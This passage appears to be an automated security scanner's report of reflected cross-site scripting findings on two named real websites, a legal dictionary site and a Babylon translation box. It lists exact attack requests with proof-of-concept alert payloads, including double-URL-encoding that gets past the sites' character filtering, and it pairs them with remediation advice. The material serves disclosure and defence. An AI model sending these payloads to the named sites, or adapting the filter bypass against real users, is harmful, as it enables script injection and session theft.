There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /OJJDPs-Performance-Measures-Glossaryf8f70%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed3a061e205b/ HTTP/1.1
Host: miscellaneous.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:15:08 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 25742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<a href="/OJJDPs-Performance-Measures-Glossaryf8f70"><script>alert(1)</script>d3a061e205b/">
...[SNIP]...

1.43. http://miscellaneous.legaldictionaries.org/OJJDPs-Performance-Measures-Glossary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://miscellaneous.legaldictionaries.org
Path:   /OJJDPs-Performance-Measures-Glossary/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 1cb97%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e162a0461be7 was submitted in the REST URL parameter 1. This input was echoed as 1cb97</title><script>alert(1)</script>162a0461be7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /OJJDPs-Performance-Measures-Glossary1cb97%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e162a0461be7/ HTTP/1.1
Host: miscellaneous.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:16:16 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 26119

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<title>OJJDPs Performance Measures Glossary1cb97</title><script>alert(1)</script>162a0461be7 Dictionary | Free Online Legal Dictionary</title>
...[SNIP]...

1.44. http://miscellaneous.legaldictionaries.org/OJJDPs-Performance-Measures-Glossary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://miscellaneous.legaldictionaries.org
Path:   /OJJDPs-Performance-Measures-Glossary/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3b324%253cscript%253ealert%25281%2529%253c%252fscript%253ecfa6a8c3e5b was submitted in the REST URL parameter 1. This input was echoed as 3b324<script>alert(1)</script>cfa6a8c3e5b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /OJJDPs-Performance-Measures-Glossary3b324%253cscript%253ealert%25281%2529%253c%252fscript%253ecfa6a8c3e5b/ HTTP/1.1
Host: miscellaneous.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:15:36 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 25392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
</script>cfa6a8c3e5b/">OJJDPs Performance Measures Glossary3b324<script>alert(1)</script>cfa6a8c3e5b</a>
...[SNIP]...

1.45. http://miscellaneous.legaldictionaries.org/OJJDPs-Performance-Measures-Glossary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://miscellaneous.legaldictionaries.org
Path:   /OJJDPs-Performance-Measures-Glossary/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56e8a%2527%253balert%25281%2529%252f%252fae83389a4c9 was submitted in the REST URL parameter 1. This input was echoed as 56e8a';alert(1)//ae83389a4c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /OJJDPs-Performance-Measures-Glossary56e8a%2527%253balert%25281%2529%252f%252fae83389a4c9/ HTTP/1.1
Host: miscellaneous.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:15:24 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 24121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
').term.value;
           }
           if (document.myform.operation[2] && document.myform.operation[2].checked == true) {
           var loc = 'http://miscellaneous.legaldictionaries.org/OJJDPs-Performance-Measures-Glossary56e8a';alert(1)//ae83389a4c9/' + document.getElementById('define').term.value;
           }
       }
       var myExp = /\s/g;
       var loc2 = loc.replace(myExp,"_");
       location = loc2;
   }
   
   function bar(e){
       var keycode;
       if (window.event) keycod
...[SNIP]...

1.46. http://miscellaneous.legaldictionaries.org/Presidents-DNA-Initiative-Glossary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://miscellaneous.legaldictionaries.org
Path:   /Presidents-DNA-Initiative-Glossary/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1e77%2527%253balert%25281%2529%252f%252f45ee6a063d0 was submitted in the REST URL parameter 1. This input was echoed as b1e77';alert(1)//45ee6a063d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Presidents-DNA-Initiative-Glossaryb1e77%2527%253balert%25281%2529%252f%252f45ee6a063d0/ HTTP/1.1
Host: miscellaneous.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:15:24 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 24006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
ne').term.value;
           }
           if (document.myform.operation[2] && document.myform.operation[2].checked == true) {
           var loc = 'http://miscellaneous.legaldictionaries.org/Presidents-DNA-Initiative-Glossaryb1e77';alert(1)//45ee6a063d0/' + document.getElementById('define').term.value;
           }
       }
       var myExp = /\s/g;
       var loc2 = loc.replace(myExp,"_");
       location = loc2;
   }
   
   function bar(e){
       var keycode;
       if (window.event) keycod
...[SNIP]...

1.47. http://miscellaneous.legaldictionaries.org/Presidents-DNA-Initiative-Glossary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://miscellaneous.legaldictionaries.org
Path:   /Presidents-DNA-Initiative-Glossary/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload af771%253cscript%253ealert%25281%2529%253c%252fscript%253e25a8a2e4717 was submitted in the REST URL parameter 1. This input was echoed as af771<script>alert(1)</script>25a8a2e4717 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Presidents-DNA-Initiative-Glossaryaf771%253cscript%253ealert%25281%2529%253c%252fscript%253e25a8a2e4717/ HTTP/1.1
Host: miscellaneous.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:15:37 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 25286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
</script>25a8a2e4717/">Presidents DNA Initiative Glossaryaf771<script>alert(1)</script>25a8a2e4717</a>
...[SNIP]...

1.48. http://miscellaneous.legaldictionaries.org/Presidents-DNA-Initiative-Glossary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://miscellaneous.legaldictionaries.org
Path:   /Presidents-DNA-Initiative-Glossary/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 36fa8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb86f565e2de was submitted in the REST URL parameter 1. This input was echoed as 36fa8</title><script>alert(1)</script>b86f565e2de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Presidents-DNA-Initiative-Glossary36fa8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb86f565e2de/ HTTP/1.1
Host: miscellaneous.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:16:16 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 26011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<title>Presidents DNA Initiative Glossary36fa8</title><script>alert(1)</script>b86f565e2de Dictionary | Free Online Legal Dictionary</title>
...[SNIP]...

1.49. http://miscellaneous.legaldictionaries.org/Presidents-DNA-Initiative-Glossary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://miscellaneous.legaldictionaries.org
Path:   /Presidents-DNA-Initiative-Glossary/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2eae1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb04dda35403 was submitted in the REST URL parameter 1. This input was echoed as 2eae1"><script>alert(1)</script>b04dda35403 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Presidents-DNA-Initiative-Glossary2eae1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb04dda35403/ HTTP/1.1
Host: miscellaneous.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:15:08 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 25639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<a href="/Presidents-DNA-Initiative-Glossary2eae1"><script>alert(1)</script>b04dda35403/">
...[SNIP]...

1.50. http://miscellaneous.legaldictionaries.org/SBB-Glossary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://miscellaneous.legaldictionaries.org
Path:   /SBB-Glossary/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d617%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6ca2ecd654d was submitted in the REST URL parameter 1. This input was echoed as 3d617"><script>alert(1)</script>6ca2ecd654d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /SBB-Glossary3d617%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6ca2ecd654d/ HTTP/1.1
Host: miscellaneous.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:15:09 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 24451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<a href="/SBB-Glossary3d617"><script>alert(1)</script>6ca2ecd654d/">
...[SNIP]...

1.51. http://miscellaneous.legaldictionaries.org/SBB-Glossary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://miscellaneous.legaldictionaries.org
Path:   /SBB-Glossary/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 11e68%253cscript%253ealert%25281%2529%253c%252fscript%253e97eb451e3db was submitted in the REST URL parameter 1. This input was echoed as 11e68<script>alert(1)</script>97eb451e3db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /SBB-Glossary11e68%253cscript%253ealert%25281%2529%253c%252fscript%253e97eb451e3db/ HTTP/1.1
Host: miscellaneous.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:15:36 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 24098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
</script>97eb451e3db/">SBB Glossary11e68<script>alert(1)</script>97eb451e3db</a>
...[SNIP]...

1.52. http://miscellaneous.legaldictionaries.org/SBB-Glossary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://miscellaneous.legaldictionaries.org
Path:   /SBB-Glossary/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5648%2527%253balert%25281%2529%252f%252f56e2f4ce48f was submitted in the REST URL parameter 1. This input was echoed as b5648';alert(1)//56e2f4ce48f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /SBB-Glossaryb5648%2527%253balert%25281%2529%252f%252f56e2f4ce48f/ HTTP/1.1
Host: miscellaneous.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:15:24 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 22796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
t.getElementById('define').term.value;
           }
           if (document.myform.operation[2] && document.myform.operation[2].checked == true) {
           var loc = 'http://miscellaneous.legaldictionaries.org/SBB-Glossaryb5648';alert(1)//56e2f4ce48f/' + document.getElementById('define').term.value;
           }
       }
       var myExp = /\s/g;
       var loc2 = loc.replace(myExp,"_");
       location = loc2;
   }
   
   function bar(e){
       var keycode;
       if (window.event) keycod
...[SNIP]...

1.53. http://miscellaneous.legaldictionaries.org/SBB-Glossary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://miscellaneous.legaldictionaries.org
Path:   /SBB-Glossary/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload e8bd9%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef9f7d1e6433 was submitted in the REST URL parameter 1. This input was echoed as e8bd9</title><script>alert(1)</script>f9f7d1e6433 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /SBB-Glossarye8bd9%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef9f7d1e6433/ HTTP/1.1
Host: miscellaneous.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:16:16 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 24816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<title>SBB Glossarye8bd9</title><script>alert(1)</script>f9f7d1e6433 Dictionary | Free Legal Dictionary</title>
...[SNIP]...

1.54. http://online.babylon.com/trans_box/tbv2.php [affiliate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.babylon.com
Path:   /trans_box/tbv2.php

Issue detail

The value of the affiliate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e7eb"><script>alert(1)</script>55d37153589 was submitted in the affiliate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trans_box/tbv2.php?lang=EN&affiliate=CD41007e7eb"><script>alert(1)</script>55d37153589&pic=http://affiliates.babylon.com/42/4100/4585&url=http://affiliates.babylon.com/z/4585/CD4100/&x=12&y=70&height=40&width=170&uri=&comma=EN,DE,ES,FR,HE,IT,JA,NL,PT,SR,ZHS,ZHT,KO,RU,SV,TR&bg_color=&but=http://affiliates.babylon.com/42/4100/4586&but_size=46&sbut_size=47&oldervar=0&showsearch=1&sbut=http://affiliates.babylon.com/42/4100/4587&default_keyword= HTTP/1.1
Host: online.babylon.com
Proxy-Connection: keep-alive
Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 16:59:18 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5459

<!-- version server --><!--old var isnt set -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
   <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
   <t
...[SNIP]...
<input type="hidden" id="cid" name="cid" value="CD41007e7eb"><script>alert(1)</script>55d37153589" />
...[SNIP]...

1.55. http://online.babylon.com/trans_box/tbv2.php [affiliate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.babylon.com
Path:   /trans_box/tbv2.php

Issue detail

The value of the affiliate request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87680'%3balert(1)//2dfc2e7522a was submitted in the affiliate parameter. This input was echoed as 87680';alert(1)//2dfc2e7522a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /trans_box/tbv2.php?lang=EN&affiliate=CD410087680'%3balert(1)//2dfc2e7522a&pic=http://affiliates.babylon.com/42/4100/4585&url=http://affiliates.babylon.com/z/4585/CD4100/&x=12&y=70&height=40&width=170&uri=&comma=EN,DE,ES,FR,HE,IT,JA,NL,PT,SR,ZHS,ZHT,KO,RU,SV,TR&bg_color=&but=http://affiliates.babylon.com/42/4100/4586&but_size=46&sbut_size=47&oldervar=0&showsearch=1&sbut=http://affiliates.babylon.com/42/4100/4587&default_keyword= HTTP/1.1
Host: online.babylon.com
Proxy-Connection: keep-alive
Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 16:59:18 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5429

<!-- version server --><!--old var isnt set -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
   <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
   <t
...[SNIP]...
yId("q").value;
           url="http://search.babylon.com/web/"+qStr+"?";
           url=url+"tl="+tl;
           url=url+"&uil="+uil;
           //document.transbox.action=url;
       
           //return true;
        window.open(url+'&cid=CD410087680';alert(1)//2dfc2e7522a',null,'status=yes,toolbar=yes,menubar=yes,location=yes,resizable =yes,scrollbars=yes');
       } else if (document.transbox._pressed.value == 'Term') {
           
           document.transbox.action ="http://info.babylon
...[SNIP]...

1.56. http://online.babylon.com/trans_box/tbv2.php [bg_color parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.babylon.com
Path:   /trans_box/tbv2.php

Issue detail

The value of the bg_color request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d113"><script>alert(1)</script>e3507f2ee8a was submitted in the bg_color parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trans_box/tbv2.php?lang=EN&affiliate=CD4100&pic=http://affiliates.babylon.com/42/4100/4585&url=http://affiliates.babylon.com/z/4585/CD4100/&x=12&y=70&height=40&width=170&uri=&comma=EN,DE,ES,FR,HE,IT,JA,NL,PT,SR,ZHS,ZHT,KO,RU,SV,TR&bg_color=8d113"><script>alert(1)</script>e3507f2ee8a&but=http://affiliates.babylon.com/42/4100/4586&but_size=46&sbut_size=47&oldervar=0&showsearch=1&sbut=http://affiliates.babylon.com/42/4100/4587&default_keyword= HTTP/1.1
Host: online.babylon.com
Proxy-Connection: keep-alive
Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 16:59:19 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5406

<!-- version server --><!--old var isnt set -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
   <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
   <t
...[SNIP]...
<div style="position: absolute; text-align : center; width : 174px; height : 48px; top: 70px; left: 12px; background : #8d113"><script>alert(1)</script>e3507f2ee8a">
...[SNIP]...

1.57. http://online.babylon.com/trans_box/tbv2.php [but parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.babylon.com
Path:   /trans_box/tbv2.php

Issue detail

The value of the but request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74d79"><script>alert(1)</script>8e268187563 was submitted in the but parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trans_box/tbv2.php?lang=EN&affiliate=CD4100&pic=http://affiliates.babylon.com/42/4100/4585&url=http://affiliates.babylon.com/z/4585/CD4100/&x=12&y=70&height=40&width=170&uri=&comma=EN,DE,ES,FR,HE,IT,JA,NL,PT,SR,ZHS,ZHT,KO,RU,SV,TR&bg_color=&but=http://affiliates.babylon.com/42/4100/458674d79"><script>alert(1)</script>8e268187563&but_size=46&sbut_size=47&oldervar=0&showsearch=1&sbut=http://affiliates.babylon.com/42/4100/4587&default_keyword= HTTP/1.1
Host: online.babylon.com
Proxy-Connection: keep-alive
